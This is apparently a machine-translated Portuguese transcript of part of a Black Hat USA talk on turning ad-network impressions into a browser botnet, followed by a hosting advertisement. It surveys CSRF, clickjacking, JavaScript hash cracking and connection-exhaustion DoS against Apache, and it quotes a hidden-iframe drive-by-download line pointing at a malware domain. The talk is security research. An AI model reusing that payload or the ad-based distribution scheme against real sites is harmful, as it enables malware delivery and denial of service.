ConferĂȘncia BLACK HAT USA. Botnet de um milhĂŁo de navegadores. Parte 1

Jeremy Grossman: Fico feliz em receber todos vocĂȘs e quero dizer que estamos preparando esta apresentação hĂĄ 6 meses, por isso nos esforçamos para compartilhar nossas conquistas o mais rĂĄpido possĂ­vel. Quero agradecer a toda a equipe da Black Hat pelo convite, voltamos aqui todos os anos, adoramos este evento. Obrigado pelo chapĂ©u preto! Vamos tentar tornar a apresentação de hoje divertida, mas primeiro queremos nos apresentar.



Sou o fundador e gerente de desenvolvimento de novos produtos da WhiteHat Security, localizada em Santa Clara, CalifĂłrnia. Nossa empresa tem cerca de 300 funcionĂĄrios.

Matt é o diretor-gerente do centro de pesquisa de riscos de segurança. Na "cabeça branca", estamos empenhados principalmente em invadir sites, encontrar vulnerabilidades neles e fazer isso em grande escala. Mas ainda temos tempo para pesquisas, então hoje vamos começar a invadir navegadores e uså-los para invadir sites e mostrar todo o ciclo de segurança na web. Eu falei aqui pela primeira vez em 2002. Na maioria das vezes eu pesquiso no desenvolvimento e apresentação de nossos produtos.

Matt Johansson: Tenho experiĂȘncia em trabalhar como testador de penetração (pentester) e comecei meu trabalho na empresa por sites de hackers, porque antes eu prĂłprio chefiava o exĂ©rcito de hackers. Faço algumas pesquisas legais e tomo muito para que vocĂȘ possa entrar em contato comigo.



Jeremy Grossman: EntĂŁo, vamos começar a nossa festa. Eu nĂŁo acho que exista pelo menos uma pessoa que nĂŁo acessou a Internet hoje. Talvez agora vocĂȘ nĂŁo esteja conectado Ă  Internet, mas quando vocĂȘ chegar em casa, todos os presentes aqui e todos que vocĂȘ conhece irĂŁo interagir com ele usando um navegador. Isso Ă© apenas parte de nossas vidas diĂĄrias, e descreverei a vocĂȘ o que isso significa, mas a Internet Ă© projetada principalmente para funcionar. NĂŁo invadimos a Internet, tentamos usĂĄ-la para nossos prĂłprios propĂłsitos.

Quando vocĂȘ visita uma pĂĄgina da Web, nĂŁo importa qual navegador vocĂȘ usa - Chrome, Firefox, Safari, IE ou Opera, em qualquer caso, a Internet funciona de tal maneira que controla totalmente o navegador enquanto vocĂȘ estĂĄ nesta pĂĄgina ou quando estĂĄ procurando o prĂłximo. pĂĄgina.

O JavaScript ou o flash nesta pågina podem fazer com que o navegador faça qualquer coisa - qualquer tipo de resposta a solicitaçÔes para qualquer lugar da Internet ou intranet. Isso inclui CSRF - solicitaçÔes falsas entre sites, XSS - scripts entre sites, clickjacking e muitos outros truques que permitem obter controle sobre o navegador.

Agora tentaremos entender melhor o que é a segurança do navegador, mas a idéia principal é obter uma idéia geral do controle do navegador sem usar exploraçÔes de dia zero, contra as quais não hå patches.

Matt Johanson: Se vocĂȘ nĂŁo sabe nada sobre XSS, pode nos perguntar sobre isso.

Jeremy Grossman: Agora quero falar brevemente sobre ataques a navegadores que usam HTML ou JavaScript malicioso:

  • Pesquisa de interrogação no navegador
  • solicitaçÔes falsas entre sites; detecção de login; reconhecimento de login;
    Hackeando a intranet
    Script cruzado automĂĄtico
    malware tradicional que entra no computador do usuårio ao fazer o download usando o método Drive-by-Download;
    hash brute force cracking;
    Ataques DDoS no nĂ­vel do aplicativo.




    Neste slide, vocĂȘ vĂȘ uma amostra de Interrogação do navegador - Ă© apenas o JavaScript que permanece no navegador quando vocĂȘ acessa outro site. Esta Ă© uma captura de tela da CNN. Quando vocĂȘ visita o site, a mĂ©trica Ă© conectada ao seu navegador, que realiza uma pesquisa completa e recebe um monte de informaçÔes sobre sua visualização: qual navegador vocĂȘ tem, qual versĂŁo, quais plugins estĂŁo conectados, qual sistema operacional vocĂȘ possui. Eles fazem isso porque querem saber quem visitou o site. Atualmente, essa Ă© uma tecnologia muito comum.

    Em seguida, considere uma tecnologia mais avançada - falsificação de JavaScript entre sites. NĂŁo requer muito esforço, vocĂȘ nĂŁo precisa executar um script malicioso, apenas o seu navegador com JavaScript ou HTML Ă© usado para invadir qualquer outro site. O CSRF usa seu histĂłrico de pesquisa do Google e força seu navegador a carregar ou baixar conteĂșdo ilegal, iniciar uma transferĂȘncia bancĂĄria, se vocĂȘ acessar sua conta pessoal no site do banco, forçarĂĄ o envio de mensagens abusivas ou o voto de Ed Snowden como a pessoa do ano.

    Matt Johanson: O CSRF pode forçå-lo a não apenas baixar os hits de Justin Bieber, mas também baixar pornografia infantil.

    Jeremy Grossman: entĂŁo, a primeira linha do slide força o navegador a injetar conteĂșdo malicioso em qualquer outro site, ou seja, pode tornĂĄ-lo um hacker, a segunda obriga a baixar o torrent e o transforma em um pirata que viola todos os tipos de licenças DMCA, e a terceira o envia ao clube de fĂŁs Justin Bieber, quarta votação em algum site.



    A seguir, Ă© o reconhecimento do login de Detecção de login - Ă© quando vocĂȘ acessa o site que controlamos. Podemos descobrir que vocĂȘ estĂĄ conectado Ă  sua conta no Google, Facebook, Twitter, Linkedin. Existem 6 tecnologias diferentes para extrair dados de autorização do seu navegador. Estudamos suas preferĂȘncias e realizamos um ataque direcionado a um usuĂĄrio especĂ­fico.



    Outro ataque Ă© o clickjacking, que permite revelar seus dados assim que vocĂȘ clica em qualquer imagem ou botĂŁo. Digamos que vocĂȘ fez login no Twitter ou no Facebook e gostou da imagem de um gato dançando. VocĂȘ clica em algo inofensivo, mas, na realidade, clica em um desses botĂ”es e revela seus dados. Apenas um clique - e sabemos o seu nome, localização, os dados que vocĂȘ publicou no seu perfil no Twitter ou LinkedIn.



    Matt Johanson: algumas empresas estão envolvidas nesse rastreamento, pois seu nome completo pode ser de grande valor para a publicidade direcionada de seus produtos ou serviços.

    Jeremy Grossman: AtĂ© agora, discutimos coisas bem conhecidas, pelo menos bem conhecidas do pĂșblico da Black Hat. VocĂȘ tambĂ©m estĂĄ ciente de violar a intranet da Intranet injetando JavaScript malicioso via HTTP no roteador DSL que fornece conectividade de rede.



    Isso foi descoberto pela primeira vez em 2006 e atĂ© agora essa vulnerabilidade nĂŁo foi corrigida. AlĂ©m disso, temos o tipo de ataque “script automĂĄtico entre sites”, ao usar o iframe, uma injeção de cĂłdigo XSS malicioso Ă© executada, o que permite roubar seus cookies, senhas salvas e assim por diante. Isso Ă© feito principalmente atravĂ©s do portal do provedor de email.



    Por fim, vocĂȘ pode baixar o malware tradicional usando o mĂ©todo Drive-by-Downloads injetando a seguinte linha:

    <iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe> 

    Como resultado, seu navegador Ă© enviado para sites infectados para baixar conteĂșdo malicioso, que controla seu computador. Aqui, o objeto do ataque pode ser o prĂłprio navegador ou suas extensĂ”es; principalmente, esses ataques sĂŁo usados ​​para criar uma rede de botnets; para evitar essa ameaça, vocĂȘ precisa instalar os patches no prazo e Ă© melhor remover o Java completamente. Resumidamente, esses sĂŁo os mĂ©todos de ataque nos quais focaremos nesta palestra.

    Matt Johansson: Jeremy falou sobre coisas jĂĄ mencionadas em conferĂȘncias anteriores do BlackHat. Eu gostaria de falar sobre outro estudo que se concentrou na computação distribuĂ­da usando JavaScript para quebrar senhas. Isso Ă© legal, porque vocĂȘ pode simplesmente escrever e funciona muito, muito rĂĄpido. A pesquisa de Lavakumar Kuppan sugere que, com a mĂ©trica que ele inventou, vocĂȘ pode realmente hackear ou tentar quebrar cem mil hashes MD5 por segundo usando JavaScript, se vocĂȘ puder distribuir esse JavaScript.

    O slide a seguir mostra como o sistema de computação distribuído Ravan baseado em JavaScript funciona, que pode atacar hashes em vårios navegadores usando um ataque de força bruta.

    Ele usa o HTML5 para executar o JavaScript em segundo plano nos WebWorkers, incluindo muitos computadores nos quais um navegador estĂĄ aberto em uma Ășnica rede de adivinhação de senha. Ela encontra a senha do usuĂĄrio que corresponde a um hash especĂ­fico, classificando de 60 a 70 mil senhas por segundo, 12 WebWorkers sĂŁo usados ​​para isso.



    Isso Ă© uma coisa muito rĂĄpida, depois focaremos em como Ă© distribuĂ­da. AlĂ©m desse problema, pesquisamos seriamente aplicativos que causam falha de serviço (DoS) hĂĄ vĂĄrios meses. O navegador pode enviar um nĂșmero surpreendentemente grande de solicitaçÔes GET para um site remoto usando o COR dos WebWorkers. Durante a pesquisa, descobriu-se que cerca de 10.000 solicitaçÔes por minuto podem ser enviadas a partir de um Ășnico navegador. Ao mesmo tempo, o navegador nĂŁo mantĂ©m muitas conexĂ”es TCP abertas, apenas inicia simultaneamente muitas solicitaçÔes HTTP. VocĂȘ pode usar um Ășnico navegador e vĂĄrios navegadores destinados a um site. Mas a qualquer momento vocĂȘ pode aumentar a intensidade do ataque aumentando o nĂșmero de conexĂ”es.

    Jeremy Grossman: Vou falar sobre as limitaçÔes do navegador nas conexÔes.



    Uma ferramenta chamada Browserscope mostra quantas conexĂ”es um navegador especĂ­fico ou uma versĂŁo especĂ­fica do navegador pode suportar por vez. Todos os navegadores suportam nĂŁo mais que 6 conexĂ”es com o mesmo nome de host e o nĂșmero mĂĄximo de conexĂ”es, por exemplo, nas versĂ”es 8 e 9 do IE chega a 35. Cada navegador tem um limite no nĂșmero de conexĂ”es, nĂŁo por segurança, mas por estabilidade e desempenho, porque vocĂȘ acessa o site , envie uma solicitação e seu navegador começarĂĄ a baixar o conteĂșdo.

    Verificamos esses indicadores e podemos dizer que a maioria dos navegadores realmente oferece trabalho com 6, com no mĂĄximo 7 conexĂ”es. O slide a seguir mostra a operação do Browserscope, que testa o desempenho de vĂĄrios navegadores, criando muitas conexĂ”es simultĂąneas com o servidor. Nesse caso, havia seis conexĂ”es estĂĄveis ​​para o Firefox.

    No entanto, alguns navegadores permitem contornar essa limitação e, em nossos testes, usamos o Firefox para causar uma falha no serviço. O prĂłximo slide mostra o script Apache Killer, que ajudou a contornar a restrição do navegador, criar um fluxo inteiro de solicitaçÔes simultĂąneas ao servidor e aumentar o nĂșmero de conexĂ”es abertas simultaneamente de 6 para 300.



    O protocolo HTTP foi usado aqui, mas se vocĂȘ usar FTP pela porta 80, o nĂșmero de conexĂ”es aumentarĂĄ para 400, e isso realmente pode "matar" o servidor Apache.

    Matt Johanson: A diferença importante aqui Ă© que fizemos isso usando FTP, que nĂŁo pode usar o protocolo HTTP. Portanto, nĂŁo conseguimos verificar muitas posiçÔes no topo da lista e nĂŁo conseguimos executar muitos aplicativos de RSE. Essas sĂŁo apenas as conexĂ”es que tentamos abrir ao mesmo tempo, portanto, esse nĂŁo Ă© um ataque tradicional de DoS, quando um invasor tenta iniciar o maior nĂșmero possĂ­vel de megabits ou gigabits por segundo ou por hora, esse Ă© apenas o nĂșmero permitido de conexĂ”es abertas simultaneamente.

    Jeremy Grossman: agora vou rodar o servidor Apache no meu laptop, esta é uma versão simples do Apache 2.4.4, onde todas as configuraçÔes båsicas são definidas por padrão e não podem ter impacto significativo.



    Vamos nos concentrar no primeiro ciclo, vou instalar um monte de solicitaçÔes de imagem no servidor aqui, vocĂȘ vĂȘ como as solicitaçÔes sĂŁo enviadas e o servidor nĂŁo responde por 3 segundos e as fotos começam a ser carregadas em sĂ©rie.

    Matt Johanson: Esse Ă© um aspecto do desempenho do navegador, nĂŁo um aspecto da segurança. Podemos abusar dele Ă s custas da segurança; vocĂȘ o verĂĄ em alguns minutos. Mas o objetivo dessa ação Ă© fazer o download de todas essas imagens de uma sĂł vez.

    Jeremy Grossman: Esqueci de mencionar o status do servidor; na tela inferior esquerda, vocĂȘ vĂȘ que o status mostra 7 conexĂ”es abertas simultaneamente, uma para a janela do navegador e a outra 6 para 6 imagens carregadas. Isso Ă© muito importante, porque agora estamos tentando quebrar a borda superior das conexĂ”es neste navegador em particular. Agora vou definir o valor da conexĂŁo como 0 para eliminar essas conexĂ”es e mostrar uma maneira de ignorar as restriçÔes no Firefox.

    Simplesmente fazemos loop até 100 conexÔes usando FTP para o mesmo nome de host. Todos eles não precisam de um URL, porque é FTP, não envia HTTP. Olhe no canto inferior esquerdo - o status do servidor mudou, mostra 100 conexÔes, 100 påginas para visualização. Agora vamos passar para 400 conexÔes.

    A pĂĄgina Ă© atualizada a cada segundo e, quando o nĂșmero de conexĂ”es atinge 270, o servidor sofre um "pĂąnico" de nĂŁo ter tempo para atender a mais solicitaçÔes. Tudo o que fazemos Ă© fazer upload desse cĂłdigo em uma pĂĄgina da Web, e o Apache estĂĄ tentando elevar o nĂșmero de conexĂ”es abertas simultĂąneas para 300. E fazemos tudo isso com um Ășnico navegador.

    Na parte de trĂĄs do plano de fundo, vocĂȘ vĂȘ outra rolagem, temos outro sistema na Amazon, este Ă© o sistema da AWS. NĂŁo quero matĂĄ-la com um ataque de negação de serviço no momento. Ofereci-lhe outra opção de demonstração.
    Matt Johansson: Agora sabemos o que podemos fazer, pelo menos com o Firefox. Este não é um ataque tradicional de negação de serviço e a botnet não é usada aqui. Ainda temos mais algumas possibilidades, mas, em geral, as vantagens de invadir esse método de ataque são as seguintes:

    • nenhum malware, nenhuma exploração ou ataques de dia zero sĂŁo necessĂĄrios;
    • sem vestĂ­gios, sem ansiedade, proibição de cache do navegador;
    • por padrĂŁo, qualquer navegador Ă© vulnerĂĄvel a esse ataque;
    • muito fĂĄcil de implementar, vocĂȘ viu como o cĂłdigo Ă© simples;
    • como dizemos - funciona da maneira que deveria funcionar. A Internet Ă© potencialmente projetada para funcionar dessa maneira, ou seja, deve garantir que vĂĄrias imagens sejam baixadas o mais rĂĄpido possĂ­vel.

    Portanto, não sei quem pode corrigir esse problema. Vamos nos concentrar na questão de espalhar esse método de ataque usando código JavaScript malicioso. Não consideraremos as formas clåssicas que os spammers usam, como o envio de e-mails. Considere a distribuição por um usuårio comum, ou seja, dimensionando do ponto de vista de um usuårio comum:

    • uso de sites com trĂĄfego significativo que vocĂȘ possui (blog, software etc.);
    • InjeçÔes de HTML em sites populares, fĂłruns etc.
    • o mĂ©todo "man in the middle" atravĂ©s de um roteador Wi-Fi;
    • "Envenenamento" dos motores de busca;
    • sites de hackers por injeção em massa de worms SQL;
    • widgets de terceiros (previsĂŁo do tempo, contadores, rastreadores etc.).

    Douglas Crockford disse: "A maneira mais confiĂĄvel e econĂŽmica de injetar cĂłdigo malicioso Ă© comprar anĂșncios". Portanto, consideraremos como as redes de publicidade funcionam, porque existem muitas na Internet. O prĂłximo slide mostra um ecossistema de publicidade peculiar.



    Portanto, na parte superior, vocĂȘ vĂȘ que os anunciantes devem mostrar antes de tudo algo, por exemplo, um buquĂȘ de flores para uma data. Eles gastam dinheiro com isso, mas precisam de sites para levar seus produtos ao consumidor final. Eles querem manter em suas mĂŁos distribuidores de massa - editores de informaçÔes como blogs, notĂ­cias, redes sociais, resenhas, sites populares visitados por muitos usuĂĄrios. Existe uma ponte entre anunciantes e editores chamada Redes de publicidade. Eles gastam dinheiro publicando suas informaçÔes nessas redes, podem ser imagens, banners pop-up, JavaScript - qualquer coisa que vocĂȘ queira ver. VocĂȘs sĂŁo as pequenas figuras azuis na parte inferior do slide.

    Matt Johansson: Hoje de manhĂŁ, fomos ao site da TMZ e fizemos uma captura de tela incrĂ­vel lĂĄ.



    VocĂȘ vĂȘ o bloco de anĂșncios na parte superior da pĂĄgina e no canto inferior direito.

    Jeremy Grossman: todos os blocos de anĂșncios que vocĂȘ vĂȘ sĂŁo cĂłdigos JavaScript localizados diretamente na frente dos usuĂĄrios do site da TMZ e servem para atrair sua atenção e ganhar dinheiro. Existem dezenas e centenas dessas redes de publicidade, mas lembre-se de que a imagem do logotipo da nossa empresa no canto superior direito do slide nĂŁo Ă© uma rede de publicidade! Algumas dessas redes usam JavaScript, outras nĂŁo.

    EntĂŁo, escrevi para os proprietĂĄrios de uma rede de publicidade uma carta sobre o que eu gostaria de colocar JavaScript de publicidade de terceiros em seu sistema. Um dos caras me respondeu muito rapidamente, literalmente em alguns minutos. Ele escreveu que eles permitem apenas que esse cĂłdigo seja publicado em empresas grandes e conhecidas, como a DoubleClick, nas quais confiam e que examinam todos os materiais em busca de possĂ­veis vulnerabilidades. E se eu trabalhar com servidores de anĂșncios de terceiros grandes como o DFA e similares, eles encontrarĂŁo a oportunidade de hospedar meu JavaScript.



    Todas as redes de publicidade tradicionais se comportam dessa maneira - vocĂȘ paga a eles, recebe algumas mĂ©tricas e eles colocam seu anĂșncio. Existe outro tipo de rede que encontramos. Deliberadamente, nĂŁo fornecemos seus nomes, porque nĂŁo sabemos se teremos problemas por causa disso.



    Esses sistemas funcionam dessa maneira - vocĂȘ paga um pouco de dinheiro por alguĂ©m sentado em casa na frente do computador Ă  noite para visualizar sua pĂĄgina no navegador por um certo perĂ­odo de tempo. Acontece que vocĂȘ compra o tempo do navegador por um centavo - nesse caso, 10 mil minutos de visualização podem ser comprados por cerca de US $ 10,5.

    Matt Johansson: Uma circunstĂąncia importante Ă© que esse mĂ©todo de visualizaçÔes pagas Ă© amplamente usado para quebrar uma senha. Como um invasor precisa de muito tempo para quebrar uma senha ou fazer login usando o mĂ©todo de força bruta, essas redes de anĂșncios nĂŁo garantem que o navegador esteja exibindo anĂșncios, mas nĂŁo capturam cĂłdigo malicioso iniciado assim que um anĂșncio Ă© carregado na pĂĄgina. VocĂȘ paga por isso, mas se uma pessoa fica lĂĄ por um minuto, 10 minutos, 2 segundos, nĂŁo hĂĄ garantia de que vocĂȘ nĂŁo pagarĂĄ pelo fato de poder ser usado para um ataque de negação de serviço.

    Jeremy Grossman: preste atenção na Ășltima linha - vocĂȘ pode comprar um milhĂŁo de minutos de visualização, sĂŁo quase 2 anos de tempo do navegador, por cerca de US $ 650. Portanto, essa Ă© uma boa mĂ©trica!

    Agora, a Internet trabalha com publicidade e vale um centavo. Vamos voltar Ă  agenda e focar nos dois Ășltimos tipos de ataques - cracking de hash de força bruta e ataques DDoS no nĂ­vel do aplicativo. VocĂȘ vĂȘ que eles podem ser facilmente redimensionados para um milhĂŁo pelo navegador ou simplesmente pagar US $ 650 e começar a invadir a senha por um perĂ­odo de dois anos. Vamos mostrar algumas demonstraçÔes, mas primeiro, vamos falar sobre economia.

    Matt Johansson: VocĂȘ viu esta captura de tela da compra de minutos, mas as redes de anĂșncios tĂȘm seu prĂłprio idioma, o que nĂŁo foi fĂĄcil para mim aprender. Os anunciantes chamam isso de "impressĂ”es", mas estamos falando de serviços de publicidade paga em pĂĄginas especĂ­ficas. Nos Ășltimos meses, o preço ficou em cerca de 50 centavos por 1.000 "impressĂ”es" ou por mil impressĂ”es de anĂșncio. Existem etiquetas de preço de CPC e custo de mil CPM.



    Portanto, quando digo "impressĂŁo", vocĂȘ deve imaginar o navegador como um bot, como se tivesse contratado uma pessoa para fazer upload de seus anĂșncios no navegador e obter o controle desse navegador no momento. EntĂŁo, eles chamam de "impressĂŁo", e nĂłs chamamos de "bot".

    Jeremy Grossman: Não hå obståculos para impedir que bandidos, bandidos de verdade roubem cartÔes de crédito, possam usar esses cartÔes roubados para comprar minutos de publicidade ou "impressÔes".

    Matt Johanson: Na captura de tela a seguir, vocĂȘ vĂȘ as estatĂ­sticas da rede de anĂșncios que usamos em nossa pesquisa.



    Sentimos que estĂĄvamos na frente do painel, clicando nos botĂ”es e tentando exibir nossos anĂșncios nessa rede. NĂŁo exibimos anĂșncios, apenas manequins e nĂŁo executamos nosso cĂłdigo JavaScript. NĂłs apenas nos testamos como anunciantes e tentamos permanecer o mais discretos possĂ­vel para o usuĂĄrio e os proprietĂĄrios da rede de publicidade, para que eles nos permitam usar nossos mĂ©todos pacĂ­ficos de hackers, comandando nossos prĂłprios servidores da web. Nos poucos meses de nossa pesquisa, nem gastamos 10 dĂłlares.

    VocĂȘ pode definir limites diĂĄrios para todos os tipos de itens de publicidade, escolher palavras-chave especĂ­ficas nas quais os usuĂĄrios devem se concentrar, escolher a localização geogrĂĄfica do pĂșblico-alvo, sistemas operacionais ou navegadores em que seu anĂșncio serĂĄ exibido, concentrar os anĂșncios nos dispositivos mĂłveis ou estacionĂĄrios dos usuĂĄrios.

    Acabei de escolher o maior alcance possĂ­vel do pĂșblico-alvo e escolhi a palavra "computadores" como palavra-chave. No primeiro dia, compramos apenas 15 cliques, custou US $ 4, como resultado, recebemos 8326 "impressĂ”es". Imagine que, com um investimento tĂŁo lucrativo, seu cĂłdigo possa ser baixado para 8326 navegadores por um perĂ­odo de 24 horas!

    ConferĂȘncia BLACK HAT USA. Botnet de um milhĂŁo de navegadores. Parte 2


    Obrigado por ficar conosco. VocĂȘ gosta dos nossos artigos? Deseja ver materiais mais interessantes? Ajude-nos fazendo um pedido ou recomendando a seus amigos, um desconto de 30% para os usuĂĄrios da Habr em um anĂĄlogo exclusivo de servidores bĂĄsicos que inventamos para vocĂȘ: Toda a verdade sobre o VPS (KVM) E5-2650 v4 (6 nĂșcleos) 10GB DDR4 240GB SSD 1Gbps da US $ 20 ou como dividir o servidor? (as opçÔes estĂŁo disponĂ­veis com RAID1 e RAID10, atĂ© 24 nĂșcleos e atĂ© 40GB DDR4).

    VPS (KVM) E5-2650 v4 (6 nĂșcleos) 10GB DDR4 240GB SSD de 1Gbps atĂ© dezembro de graça quando pagar por um perĂ­odo de seis meses, vocĂȘ pode fazer o pedido aqui .

    Dell R730xd 2 vezes mais barato? Somente nós temos 2 TVs Intel Dodeca-Core Xeon E5-2650v4 128GB DDR4 6x480GB SSD 1Gbps 100 a partir de US $ 249 na Holanda e nos EUA! Leia sobre Como criar um prédio de infraestrutura. classe usando servidores Dell R730xd E5-2650 v4 custando 9.000 euros por um centavo?

Source: https://habr.com/ru/post/pt426241/


All Articles